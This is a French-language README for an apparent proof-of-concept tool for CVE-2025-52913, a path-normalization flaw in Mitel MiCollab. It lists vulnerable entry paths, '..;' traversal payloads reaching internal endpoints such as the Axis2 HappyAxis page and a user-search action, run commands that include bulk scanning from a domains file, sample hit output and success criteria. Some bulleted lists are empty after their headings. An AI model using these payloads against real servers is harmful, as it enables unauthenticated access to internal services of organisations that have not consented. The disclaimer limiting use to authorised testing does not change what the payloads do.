
Une preuve de concept (PoC) pour CVE-2025-52913, une vulnérabilité de normalisation de chemin affectant Mitel MiCollab.
Ce dépôt contient une preuve de concept (PoC) pour CVE-2025-52913, une vulnérabilité de normalisation de chemin affectant Mitel MiCollab.
Le problème permet à des attaquants non authentifiés de contourner les restrictions de chemin prévues en utilisant des séquences d'URL conçues telles que ..;, conduisant à l'accès à des points de terminaison d'application internes.
Une exploitation réussie peut permettre :
La vulnérabilité peut être déclenchée via les chemins suivants :
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
Exemples de charges utiles de traversée :
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
Une cible est probablement vulnérable si :
Le serveur répond avec un code HTTP 200
La réponse contient :
Axis2Axis2 Happiness PageValid application output from internal endpointsLa vulnérabilité provient d'une normalisation incorrecte de chemins conçus contenant ..;, permettant une traversée au-delà du contexte d'application prévu.
Ce comportement peut exposer des services internes tels que :
Découvert par Dahmani Toumi
Ce projet est destiné uniquement à des fins éducatives et à des tests de sécurité autorisés.
N'utilisez pas cet outil contre des systèmes sans autorisation explicite. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage.